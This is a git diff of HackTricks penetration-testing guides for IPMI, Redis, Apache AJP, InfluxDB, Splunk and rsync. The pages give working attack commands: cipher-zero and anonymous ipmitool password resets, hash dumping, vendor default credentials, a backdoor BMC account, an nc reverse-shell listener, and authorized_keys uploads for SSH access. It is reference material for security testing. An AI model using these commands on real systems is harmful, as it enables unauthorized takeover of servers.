Shodan diff --git a/network-services-pentesting/623-udp-ipmi.md b/network-services-pentesting/623-udp-ipmi.md index f92e8371c..39f81ec31 100644 --- a/network-services-pentesting/623-udp-ipmi.md +++ b/network-services-pentesting/623-udp-ipmi.md @@ -18,23 +18,23 @@ Other ways to support HackTricks: ## Basic Information -[Intelligent Platform Management Interface](https://www.thomas-krenn.com/en/wiki/IPMI\_Basics) (`IPMI`) is a set of standardized specifications for hardware-based host management systems used for system management and monitoring. It acts as an autonomous subsystem and works independently of the host's BIOS, CPU, firmware, and underlying operating system. IPMI provides sysadmins with the ability to manage and monitor systems even if they are powered off or in an unresponsive state. It operates using a direct network connection to the system's hardware and does not require access to the operating system via a login shell. IPMI can also be used for remote upgrades to systems without requiring physical access to the target host. IPMI is typically used in three ways: +### **Overview of IPMI** -* Before the OS has booted to modify BIOS settings -* When the host is fully powered down -* Access to a host after a system failure +**[Intelligent Platform Management Interface (IPMI)](https://www.thomas-krenn.com/en/wiki/IPMI_Basics)** offers a standardized approach for remote management and monitoring of computer systems, independent of the operating system or power state. This technology allows system administrators to manage systems remotely, even when they're off or unresponsive, and is especially useful for: -When not being used for these tasks, IPMI can monitor a range of different things such as system temperature, voltage, fan status, and power supplies. It can also be used for querying inventory information, reviewing hardware logs, and alerting using SNMP. The host system can be powered off, but the IPMI module requires a power source and a LAN connection to work correctly. +- Pre-OS boot configurations +- Power-off management +- Recovery from system failures -The IPMI protocol was first published by Intel in 1998 and is now supported by over 200 system vendors, including Cisco, Dell, HP, Supermicro, Intel, and more. Systems using IPMI version 2.0 can be administered via serial over LAN, giving sysadmins the ability to view serial console output in band. To function, IPMI requires the following components: +IPMI is capable of monitoring temperatures, voltages, fan speeds, and power supplies, alongside providing inventory information, reviewing hardware logs, and sending alerts via SNMP. Essential for its operation are a power source and a LAN connection. -* Baseboard Management Controller (BMC) - A micro-controller and essential component of an IPMI -* Intelligent Chassis Management Bus (ICMB) - An interface that permits communication from one chassis to another -* Intelligent Platform Management Bus (IPMB) - extends the BMC -* IPMI Memory - stores things such as the system event log, repository store data, and more -* Communications Interfaces - local system interfaces, serial and LAN interfaces, ICMB and PCI Management Bus +Since its introduction by Intel in 1998, IPMI has been supported by numerous vendors, enhancing remote management capabilities, especially with version 2.0's support for serial over LAN. Key components include: -![](https://blog.rapid7.com/content/images/post-images/27966/IPMI-Block-Diagram.png#img-half-right) +- **Baseboard Management Controller (BMC):** The main micro-controller for IPMI operations. +- **Communication Buses and Interfaces:** For internal and external communication, including ICMB, IPMB, and various interfaces for local and network connections. +- **IPMI Memory:** For storing logs and data. + +![https://blog.rapid7.com/content/images/post-images/27966/IPMI-Block-Diagram.png#img-half-right](https://blog.rapid7.com/content/images/post-images/27966/IPMI-Block-Diagram.png#img-half-right) **Default Port**: 623/UDP/TCP (It's usually on UDP but it could also be running on TCP) @@ -55,109 +55,76 @@ use auxiliary/scanner/ipmi/ipmi_version nmap -sU --script ipmi-version -p 623 10.10.10.10 ``` -### Vulnerability - IPMI Authentication Bypass via Cipher 0 +### IPMI Vulnerabilities -Dan Farmer [identified a serious failing](http://fish2.com/ipmi/cipherzero.html) of the IPMI 2.0 specification, namely that cipher type 0, an indicator that the client wants to use clear-text authentication, actually **allows access with any password**. Cipher 0 issues were identified in HP, Dell, and Supermicro BMCs, with the issue likely encompassing all IPMI 2.0 implementations.\ -Note that to exploit this issue you first need to **find a valid user**. +In the realm of IPMI 2.0, a significant security flaw was uncovered by Dan Farmer, exposing a vulnerability through **cipher type 0**. This vulnerability, documented in detail at [Dan Farmer's research](http://fish2.com/ipmi/cipherzero.html), enables unauthorized access with any password provided a valid user is targeted. This weakness was found across various BMCs from manufacturers like HP, Dell, and Supermicro, suggesting a widespread issue within all IPMI 2.0 implementations. -You can **identify** this issue using: +### **IPMI Authentication Bypass via Cipher 0** -``` +To detect this flaw, the following Metasploit auxiliary scanner can be employed: + +```bash use auxiliary/scanner/ipmi/ipmi_cipher_zero ``` -And you can **abuse** this issue with `ipmitool`: +Exploitation of this flaw is achievable with `ipmitool`, as demonstrated below, allowing for the listing and modification of user passwords: ```bash -apt-get install ipmitool #Install -#Using -C 0 any password is accepted -ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user list #Use Cipher 0 to dump a list of users -ID Name Callin Link Auth IPMI Msg Channel Priv Limit -2 root true true true ADMINISTRATOR -3 Oper1 true true true ADMINISTRATOR -ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user set password 2 abc123 #Change the password of root +apt-get install ipmitool # Installation command +ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user list # Lists users +ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user set password 2 abc123 # Changes password ``` -### Vulnerability - IPMI 2.0 RAKP Authentication Remote Password Hash Retrieval +### **IPMI 2.0 RAKP Authentication Remote Password Hash Retrieval** -Basically, **you can ask the server for the a salted hashed MD5 and SHA1 of any username and if the username exists those hashes will be sent back.** Yeah, as amazing as it sounds. And there is a **metasploit module** for testing this (you can select the output in John or Hashcat format): +This vulnerability enables retrieval of salted hashed passwords (MD5 and SHA1) for any existing username. To test this vulnerability, Metasploit offers a module: ```bash msf > use auxiliary/scanner/ipmi/ipmi_dumphashes ``` -_Note that for this you only need a list of usernames to brute-force (metasploit already contains one with default usernames)._ +### **IPMI Anonymous Authentication** -Using `ipmitool`bypassing authentication (`-c 0`) to change the root password to abc123: - -``` -root@kali:~# apt-get install ipmitool -root@kali:~# ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user list -ID Name Callin Link Auth IPMI Msg Channel Priv Limit -2 root true true true ADMINISTRATOR -3 Oper1 true true true ADMINISTRATOR -root@kali:~# ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user set password 2 abc123 -``` - -### Vulnerability - IPMI Anonymous Authentication - -In addition to the authentication problems above, Dan Farmer noted that **many BMCs ship with "anonymous" access enabled by default**. This is configured by setting the username of the first **user** account to a **null string** and **setting** a **null password** to match. The _ipmi\_dumphashes_ module will identify and dump the password hashes (including blank passwords) for null user accounts. **This account can be difficult to use on its own, but we can leverage `ipmitool` to reset the password of a named user account** and leverage that account for access to other services: +A default configuration in many BMCs allows "anonymous" access, characterized by null username and password strings. This configuration can be exploited to reset passwords of named user accounts using `ipmitool`: ```bash ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user list - -ID Name Callin Link Auth IPMI Msg Channel Priv Limit -1 false false true ADMINISTRATOR -2 root false false true ADMINISTRATOR -3 admin true true true ADMINISTRATOR - -ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user set password 2 newpassword #Change the password of the user 2 (root) to "newpassword" +ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user set password 2 newpassword ``` -### Vulnerability - Supermicro IPMI Clear-text Passwords +### **Supermicro IPMI Clear-text Passwords** -The IPMI 2.0 specification mandates that the BMC respond to HMAC-based authentication methods such as SHA1 and MD5. This authentication process has some serious weaknesses, as demonstrated in previous examples, but also **requires access to the clear-text password in order to calculate the authentication hash**. This means that the BMC must store a **clear-text version** of all configured user passwords somewhere in **non-volatile storage**. In the case of **Supermicro**, this location changes between firmware versions, but is either **`/nv/PSBlock`** or **`/nv/PSStore`**. The passwords are scattered between various binary blobs, but easy to pick out as they always follow the username. This is a serious issue for any organization that uses shared passwords between BMCs or even different types of devices. +A critical design choice in IPMI 2.0 necessitates the storage of clear-text passwords within BMCs for authentication purposes. Supermicro's storage of these passwords in locations such as `/nv/PSBlock` or `/nv/PSStore` raises significant security concerns: ```bash - cat /nv/PSBlock - admin ADMINpassword^TT rootOtherPassword! +cat /nv/PSBlock ``` -### Vulnerability - Supermicro IPMI UPnP +### **Supermicro IPMI UPnP Vulnerability** -Supermicro includes a **UPnP SSDP listener running on UDP port 1900** on the IPMI firmware of many of its recent motherboards. On versions prior to SMT\_X9\_218 this service was running the Intel SDK for UPnP Devices, version 1.3.1. This version is vulnerable to [the issues Rapid7 disclosed](https://blog.rapid7.com/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play) in February of 2013, and an exploit target for this platform is part of the Metasploit Framework. The interesting thing about this attack is that it **yields complete root access to the BMC**, something that is otherwise difficult to obtain. Keep in mind than an attacker with administrative access, either over the network or from a root shell on the host system, can downgrade the firmware of a Supermicro BMC to a vulnerable version and then exploit it. Once **root** access is **obtained**, it is possible to **read cleartext credentials** from the file system, **install** additional **software**, and integrate permanent **backdoors** into the BMC that would survive a full reinstall of the host's operating system. +Supermicro's inclusion of a UPnP SSDP listener in its IPMI firmware, particularly on UDP port 1900, introduces a severe security risk. Vulnerabilities in the Intel SDK for UPnP Devices version 1.3.1, as detailed by [Rapid7's disclosure](https://blog.rapid7.com/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play), allow for root access to the BMC: ```bash msf> use exploit/multi/upnp/libupnp_ssdp_overflow ``` + ### Brute Force -Note that only HP randomizes the password during the manufacturing process. +**HP randomizes the default password** for its **Integrated Lights Out (iLO)** product during manufacture. This practice contrasts with other manufacturers, who tend to use **static default credentials**. A summary of default usernames and passwords for various products is provided as follows: -| Product Name | Default Username | Default Password | -| --------------------------------------------------- | ---------------- | ---------------------------------------- | -| **HP Integrated Lights Out (iLO)** | Administrator | \ | -| **Dell Remote Access Card (iDRAC, DRAC)** | root | calvin | -| **IBM Integrated Management Module (IMM)** | USERID | PASSW0RD (with a zero) | -| **Fujitsu Integrated Remote Management Controller** | admin | admin | -| **Supermicro IPMI (2.0)** | ADMIN | ADMIN | -| **Oracle/Sun Integrated Lights Out Manager (ILOM)** | root | changeme | -| **ASUS iKVM BMC** | admin | admin | +- **HP Integrated Lights Out (iLO)** uses a **factory randomized 8-character string** as its default password, showcasing a higher security level. +- Products like **Dell's iDRAC, IBM's IMM**, and **Fujitsu's Integrated Remote Management Controller** use easily guessable passwords such as "calvin", "PASSW0RD" (with a zero), and "admin" respectively. +- Similarly, **Supermicro IPMI (2.0), Oracle/Sun ILOM**, and **ASUS iKVM BMC** also use simple default credentials, with "ADMIN", "changeme", and "admin" serving as their passwords. -## Exploiting the Host from the BMC -Once administrative access to the BMC is obtained, there are a number of methods available that can be used to gain access to the host operating system. The most direct path is to abuse the BMCs KVM functionality and reboot the host to a root shell (init=/bin/sh in GRUB) or specify a rescue disk as a virtual CD-ROM and boot to that. Once raw access to the host's disk is obtained, it is trivial to introduce a backdoor, copy data from the hard drive, or generally do anything needing doing as part of the security assessment. The big downside, of course, is that the host has to be rebooted to use this method. Gaining access to the host running is much trickier and depends on what the host is running. If the physical console of the host is left logged in, it becomes trivial to hijack this using the built-in KVM functionality. The same applies to serial consoles - if the serial port is connected to an authenticated session, the BMC may allow this port to be hijacked using the ipmitool interface for serial-over-LAN (sol). One path that still needs more research is abusing access to shared hardware, such as the i2c bus and the Super I/O chip. +## Accessing the Host via BMC -![](https://blog.rapid7.com/content/images/post-images/27966/ipmi\_bios.png) +Administrative access to the Baseboard Management Controller (BMC) opens various pathways for accessing the host's operating system. A straightforward approach involves exploiting the BMC's Keyboard, Video, Mouse (KVM) functionality. This can be done by either rebooting the host to a root shell via GRUB (using `init=/bin/sh`) or booting from a virtual CD-ROM set as a rescue disk. Such methods allow for direct manipulation of the host's disk, including the insertion of backdoors, data extraction, or any necessary actions for a security assessment. However, this requires rebooting the host, which is a significant drawback. Without rebooting, accessing the running host is more complex and varies with the host's configuration. If the host's physical or serial console remains logged in, it can easily be taken over through the BMC's KVM or serial-over-LAN (sol) functionalities via `ipmitool`. Exploring the exploitation of shared hardware resources, like the i2c bus and Super I/O chip, is an area that demands further investigation. -![](https://blog.rapid7.com/content/images/post-images/27966/ipmi\_boot.png) +## Introducing Backdoors into BMC from the Host -![](<../.gitbook/assets/image (202) (2).png>) - -## Exploiting the BMC from the Host - -In situations where a host with a BMC has been compromised, the **local interface to the BMC can be used to introduce a backdoor user account**, and from there establish a permanent foothold on the server. This attack requires the **`ipmitool`** to be installed on the host and driver support to be enabled for the BMC. The example below demonstrates how the local interface on the host, which does not require authentication, can be used to inject a new user account into the BMC. This method is universal across Linux, Windows, BSD, and even DOS targets. +Upon compromising a host equipped with a BMC, the **local BMC interface can be leveraged to insert a backdoor user account**, creating a lasting presence on the server. This attack necessitates the presence of **`ipmitool`** on the compromised host and the activation of BMC driver support. The following commands illustrate how a new user account can be injected into the BMC using the host's local interface, which bypasses the need for authentication. This technique is applicable to a wide range of operating systems including Linux, Windows, BSD, and even DOS. ```bash ipmitool user list @@ -175,6 +142,7 @@ ID Name Callin Link Auth IPMI Msg Channel Priv Limit 4 backdoor true false true ADMINISTRATOR ``` + ## Shodan * `port:623` @@ -182,7 +150,6 @@ ID Name Callin Link Auth IPMI Msg Channel Priv Limit ## References * [https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/](https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/) -* [https://academy.hackthebox.com/module/112/section/1245](https://academy.hackthebox.com/module/112/section/1245)
diff --git a/network-services-pentesting/6379-pentesting-redis.md b/network-services-pentesting/6379-pentesting-redis.md index 1d78df4b2..498730796 100644 --- a/network-services-pentesting/6379-pentesting-redis.md +++ b/network-services-pentesting/6379-pentesting-redis.md @@ -31,7 +31,9 @@ Stay informed with the newest bug bounties launching and crucial platform update ## Basic Information -Redis is an open source (BSD licensed), in-memory **data structure store**, used as a **database**, cache and message broker (from [here](https://redis.io/topics/introduction)). By default and commonly Redis uses a plain-text based protocol, but you have to keep in mind that it can also implement **ssl/tls**. Learn how to [run Redis with ssl/tls here](https://fossies.org/linux/redis/TLS.md). +From [the docs](https://redis.io/topics/introduction): Redis is an open source (BSD licensed), in-memory **data structure store**, used as a **database**, cache and message broker). + +By default Redis uses a plain-text based protocol, but you have to keep in mind that it can also implement **ssl/tls**. Learn how to [run Redis with ssl/tls here](https://fossies.org/linux/redis/TLS.md). **Default port:** 6379 @@ -92,7 +94,7 @@ AUTH ### **Authenticated enumeration** -If the Redis instance is accepting **anonymous** connections or you found some **valid credentials**, you can **start enumerating** the service with the following commands: +If the Redis server permits **anonymous connections** or if you have obtained valid credentials, you can initiate the enumeration process for the service using the following **commands**: ```bash INFO @@ -103,7 +105,8 @@ CONFIG GET * [ ... Get config ... ] ``` -**Other Redis commands** [**can be found here**](https://redis.io/topics/data-types-intro) **and** [**here**](https://lzone.de/cheat-sheet/Redis)**.**\ +**Other Redis commands** [**can be found here**](https://redis.io/topics/data-types-intro) **and** [**here**](https://lzone.de/cheat-sheet/Redis)**.** + Note that the **Redis commands of an instance can be renamed** or removed in the _redis.conf_ file. For example this line will remove the command FLUSHDB: ``` @@ -223,6 +226,8 @@ Note that **several template engines cache** the templates in **memory**, so eve ### SSH +Example [from here](https://blog.adithyanak.com/oscp-preparation-guide/enumeration) + Please be aware **`config get dir`** result can be changed after other manually exploit commands. Suggest to run it first right after login into Redis. In the output of **`config get dir`** you could find the **home** of the **redis user** (usually _/var/lib/redis_ or _/home/redis/.ssh_), and knowing this you know where you can write the `authenticated_users` file to access via ssh **with the user redis**. If you know the home of other valid user where you have writable permissions you can also abuse it: 1. Generate a ssh public-private key pair on your pc: **`ssh-keygen -t rsa`** diff --git a/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md b/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md index 1751bb1d6..48655aba4 100644 --- a/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md +++ b/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md @@ -66,46 +66,6 @@ nmap -sV --script ajp-auth,ajp-headers,ajp-methods,ajp-request -n -p 8009 ## AJP Proxy -### Apache AJP Proxy - -It’s not often that you encounter port 8009 open and no other web port open. In which case it would be nice to use existing tools like metasploit to still pwn it right? As stated in one of the quotes you can (ab)use Apache to proxy the requests to Tomcat port 8009. In the references you will find a nice guide on how to do that (read it first), what follows is just an overview of the commands I used on my own machine. I omitted some of the original instruction since they didn’t seem to be necessary. - -```bash -sudo apt-get install libapache2-mod-jk -sudo vim /etc/apache2/apache2.conf # append the following line to the config - Include ajp.conf -sudo vim /etc/apache2/ajp.conf # create the following file, change HOST to the target address - ProxyRequests Off - - Order deny,allow - Deny from all - Allow from localhost - - ProxyPass / ajp://HOST:8009/ - ProxyPassReverse / ajp://HOST:8009/ -sudo a2enmod proxy_http -sudo a2enmod proxy_ajp -sudo systemctl restart apache2 -``` - -A nice side effect of using this setup is that you might thwart IDS/IPS systems in place since the AJP protocol is somewhat binary, but I haven’t verified this. Now you can just point your regular metasploit tomcat exploit to 127.0.0.1:80 and take over that system. Here is the metasploit output also: - -```bash -msf exploit(tomcat_mgr_deploy) > show options - -Module options (exploit/multi/http/tomcat_mgr_deploy): - - Name Current Setting Required Description - ---- --------------- -------- ----------- - PASSWORD tomcat no The password for the specified username - PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used) - Proxies no Use a proxy chain - RHOST localhost yes The target address - RPORT 80 yes The target port - USERNAME tomcat no The username to authenticate as - VHOST no HTTP server virtual host -``` - ### Nginx Reverse Proxy & AJP [Checkout the Dockerized version](#Dockerized-version) @@ -184,7 +144,7 @@ curl http://127.0.0.1:80 ``` -### Dockerized-version +### Nginx Dockerized-version ```bash git clone https://github.com/ScribblerCoder/nginx-ajp-docker @@ -196,9 +156,36 @@ docker build . -t nginx-ajp-proxy docker run -it --rm -p 80:80 nginx-ajp-proxy ``` +### Apache AJP Proxy + +Encountering an open port 8009 without any other accessible web ports is rare. However, it is still possible to exploit it using **Metasploit**. By leveraging **Apache** as a proxy, requests can be redirected to **Tomcat** on port 8009. + +```bash +sudo apt-get install libapache2-mod-jk +sudo vim /etc/apache2/apache2.conf # append the following line to the config + Include ajp.conf +sudo vim /etc/apache2/ajp.conf # create the following file, change HOST to the target address + ProxyRequests Off + + Order deny,allow + Deny from all + Allow from localhost + + ProxyPass / ajp://HOST:8009/ + ProxyPassReverse / ajp://HOST:8009/ +sudo a2enmod proxy_http +sudo a2enmod proxy_ajp +sudo systemctl restart apache2 +``` + +This setup offers the potential to bypass intrusion detection and prevention systems (IDS/IPS) due to the **AJP protocol's binary nature**, although this capability has not been verified. By directing a regular Metasploit Tomcat exploit to `127.0.0.1:80`, you can effectively seize control of the targeted system. + +```bash +msf exploit(tomcat_mgr_deploy) > show options +``` ## References - +* [https://github.com/yaoweibin/nginx_ajp_module](https://github.com/yaoweibin/nginx_ajp_module) * [https://academy.hackthebox.com/module/145/section/1295](https://academy.hackthebox.com/module/145/section/1295)
diff --git a/network-services-pentesting/8086-pentesting-influxdb.md b/network-services-pentesting/8086-pentesting-influxdb.md index c4887faf9..c0458ade7 100644 --- a/network-services-pentesting/8086-pentesting-influxdb.md +++ b/network-services-pentesting/8086-pentesting-influxdb.md @@ -24,11 +24,7 @@ Other ways to support HackTricks: ## Basic Information -**InfluxDB** is an open-source **time series database** (TSDB) developed by the company InfluxData. - -A **time series database (TSDB)** is a software system that is optimized for storing and **serving time series** through associated pairs of time(s) and value(s). - -Time series datasets are **relatively large and uniform compared to other datasets**―usually being composed of a timestamp and associated data. Time series datasets can also have fewer relationships between data entries in different tables and don't require indefinite storage of entries. The unique properties of time series datasets mean that time series databases can provide **significant improvements in storage space and performance over general purpose databases**. For instance, due to the uniformity of time series data, **specialized compression algorithms** can provide improvements over regular compression algorithms designed to work on less uniform data. Time series databases can also be **configured to regularly delete old data**, unlike regular databases which are designed to store data indefinitely. Special database indices can also provide boosts in query performance. (From [here](https://en.wikipedia.org/wiki/Time\_series\_database)). +**InfluxDB** is an open-source **time series database (TSDB)** developed by InfluxData. TSDBs are optimized for storing and serving time series data, which consists of timestamp-value pairs. Compared to general-purpose databases, TSDBs provide significant improvements in **storage space** and **performance** for time series datasets. They employ specialized compression algorithms and can be configured to automatically remove old data. Specialized database indices also enhance query performance. **Default port**: 8086 @@ -65,7 +61,7 @@ The information of this example was taken from [**here**](https://oznetnerd.com/ #### Show databases -The found databases are _telegraf_ and _\_internal_ (you will find this one everywhere) +The found databases are `telegraf` and `internal` (you will find this one everywhere) ```bash > show databases diff --git a/network-services-pentesting/8089-splunkd.md b/network-services-pentesting/8089-splunkd.md index 1fb39ee41..9ba2149d3 100644 --- a/network-services-pentesting/8089-splunkd.md +++ b/network-services-pentesting/8089-splunkd.md @@ -16,8 +16,9 @@ Other ways to support HackTricks: ## **Basic Information** -**Splunk** is a **log analytics tool** used to gather, analyze and visualize data. Though not originally intended to be a SIEM tool, Splunk is often used for **security monitoring and business analytics**. Splunk deployments are often used to house **sensitive data** and could provide a wealth of information for an attacker if compromised. +Splunk is a **log analytics tool** that plays a crucial role in **gathering, analyzing, and visualizing data**. While its initial purpose was not to serve as a **SIEM (Security Information and Event Management)** tool, it has gained popularity in the realm of **security monitoring** and **business analytics**. +Splunk deployments are frequently utilized to store **sensitive data** and can serve as a **valuable source of information** for potential attackers if they manage to compromise the system. **Default port:** 8089 ``` @@ -106,7 +107,7 @@ sudo nc -lnvp 443 listening on [any] 443 ... ``` -On the `Upload app` page, click on browse, choose the tarball we created earlier and click `Upload`. \*\*\*\* As **soon as we upload the application**, a **reverse shell is received** as the status of the application will automatically be switched to `Enabled`. +On the `Upload app` page, click on browse, choose the tarball we created earlier and click `Upload`. As **soon as we upload the application**, a **reverse shell is received** as the status of the application will automatically be switched to `Enabled`. #### Linux diff --git a/network-services-pentesting/8333-18333-38333-18444-pentesting-bitcoin.md b/network-services-pentesting/8333-18333-38333-18444-pentesting-bitcoin.md index 403862f8e..26e599869 100644 --- a/network-services-pentesting/8333-18333-38333-18444-pentesting-bitcoin.md +++ b/network-services-pentesting/8333-18333-38333-18444-pentesting-bitcoin.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
@@ -65,7 +65,7 @@ PORT STATE SERVICE * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. diff --git a/network-services-pentesting/873-pentesting-rsync.md b/network-services-pentesting/873-pentesting-rsync.md index c4e779572..92f4fb6f0 100644 --- a/network-services-pentesting/873-pentesting-rsync.md +++ b/network-services-pentesting/873-pentesting-rsync.md @@ -16,9 +16,9 @@ Other ways to support HackTricks: ## **Basic Information** -> **rsync** is a utility for efficiently [transferring](https://en.wikipedia.org/wiki/File\_transfer) and [synchronizing](https://en.wikipedia.org/wiki/File\_synchronization) [files](https://en.wikipedia.org/wiki/Computer\_file) between a computer and an external hard drive and across [networked](https://en.wikipedia.org/wiki/Computer\_network) [computers](https://en.wikipedia.org/wiki/Computer) by comparing the [modification times](https://en.wikipedia.org/wiki/Timestamping\_\(computing\))and sizes of files.[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite\_note-man\_page-3) It is commonly found on [Unix-like](https://en.wikipedia.org/wiki/Unix-like) [operating systems](https://en.wikipedia.org/wiki/Operating\_system). The rsync algorithm is a type of [delta encoding](https://en.wikipedia.org/wiki/Delta\_encoding), and is used for minimizing network usage. [Zlib](https://en.wikipedia.org/wiki/Zlib) may be used for additional [data compression](https://en.wikipedia.org/wiki/Data\_compression),[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite\_note-man\_page-3) and [SSH](https://en.wikipedia.org/wiki/Secure\_Shell) or [stunnel](https://en.wikipedia.org/wiki/Stunnel) can be used for security. +From [wikipedia](https://en.wikipedia.org/wiki/Rsync): -From [wikipedia](https://en.wikipedia.org/wiki/Rsync). +> **rsync** is a utility for efficiently [transferring](https://en.wikipedia.org/wiki/File\_transfer) and [synchronizing](https://en.wikipedia.org/wiki/File\_synchronization) [files](https://en.wikipedia.org/wiki/Computer\_file) between a computer and an external hard drive and across [networked](https://en.wikipedia.org/wiki/Computer\_network) [computers](https://en.wikipedia.org/wiki/Computer) by comparing the [modification times](https://en.wikipedia.org/wiki/Timestamping\_\(computing\))and sizes of files.[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite\_note-man\_page-3) It is commonly found on [Unix-like](https://en.wikipedia.org/wiki/Unix-like) [operating systems](https://en.wikipedia.org/wiki/Operating\_system). The rsync algorithm is a type of [delta encoding](https://en.wikipedia.org/wiki/Delta\_encoding), and is used for minimizing network usage. [Zlib](https://en.wikipedia.org/wiki/Zlib) may be used for additional [data compression](https://en.wikipedia.org/wiki/Data\_compression),[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite\_note-man\_page-3) and [SSH](https://en.wikipedia.org/wiki/Secure\_Shell) or [stunnel](https://en.wikipedia.org/wiki/Stunnel) can be used for security. **Default port:** 873 @@ -53,47 +53,44 @@ raidroot @RSYNCD: AUTHREQD 7H6CqsHCPG06kRiFkKwD8g <--- This means you need the password ``` -### **Enumerate shared folders** +### **Enumerating Shared Folders** -**An rsync module is essentially a directory share**. These modules **can optionally be protected by a password**. This options lists the available modules and, optionally, determines if the module requires a password to access: +**Rsync modules** are recognized as **directory shares** that might be **protected with passwords**. To identify available modules and check if they require passwords, the following commands are used: ```bash nmap -sV --script "rsync-list-modules" -p msf> use auxiliary/scanner/rsync/modules_list -#Example using IPv6 and a different port +# Example with IPv6 and alternate port rsync -av --list-only rsync://[dead:beef::250:56ff:feb9:e90a]:8730 ``` -Notice that it could be configured a shared name to not be listed. So there could be something **hidden**.\ -Notice that it may be some **shared names** being listed where you need some (different) **credentials** to access. So, not always all the listed names are going to be accessible and you will notice it if you receive an _**"Access Denied"**_ message when trying to access some of those. +Be aware that some shares might not appear in the list, possibly hiding them. Additionally, accessing some shares might be restricted to specific **credentials**, indicated by an **"Access Denied"** message. -### [**Brute force**](../generic-methodologies-and-resources/brute-force.md#rsync) +### [**Brute Force**](../generic-methodologies-and-resources/brute-force.md#rsync) -### Manual Rsync +### Manual Rsync Usage -Once you have the **list of modules** you have a few different options depending on the actions you want to take and whether or not authentication is required. **If authentication is not required** you can **list** a shared folder: +Upon obtaining a **module list**, actions depend on whether authentication is needed. Without authentication, **listing** and **copying** files from a shared folder to a local directory is achieved through: ```bash +# Listing a shared folder rsync -av --list-only rsync://192.168.0.123/shared_name -``` -And **copy** all **files** to your local machine via the following command: - -```bash +# Copying files from a shared folder rsync -av rsync://192.168.0.123:8730/shared_name ./rsyn_shared ``` -This **recursively transfers all files from the directory** `` on the machine ``into the `./rsync_shared` directory on the local machine. The files are transferred in "archive" mode, which ensures that symbolic links, devices, attributes, permissions, ownerships, etc. are preserved in the transfer. +This process **recursively transfers files**, preserving their attributes and permissions. -If you **have credentials** you can **list/download** a **shared name** using (the password will be prompted): +With **credentials**, listing and downloading from a shared folder can be done as follows, where a password prompt will appear: ```bash rsync -av --list-only rsync://username@192.168.0.123/shared_name rsync -av rsync://username@192.168.0.123:8730/shared_name ./rsyn_shared ``` -You could also **upload** some **content** using rsync (for example, in this case we can upload an _**authorized\_keys**_ file to obtain access to the box): +To **upload content**, such as an _**authorized_keys**_ file for access, use: ```bash rsync -av home_user/.ssh/ rsync://username@192.168.0.123/home_user/.ssh @@ -101,13 +98,17 @@ rsync -av home_user/.ssh/ rsync://username@192.168.0.123/home_user/.ssh ## POST -Find the rsyncd configuration file: +To locate the rsyncd configuration file, execute: ```bash find /etc \( -name rsyncd.conf -o -name rsyncd.secrets \) ``` -Inside the config file sometimes you could find the parameter _secrets file = /path/to/file_ and this file could contains usernames and passwords allowed to authenticate to rsyncd. +Within this file, a _secrets file_ parameter might point to a file containing **usernames and passwords** for rsyncd authentication. + + +## References +* [https://www.smeegesec.com/2016/12/pentesting-rsync.html](https://www.smeegesec.com/2016/12/pentesting-rsync.html)
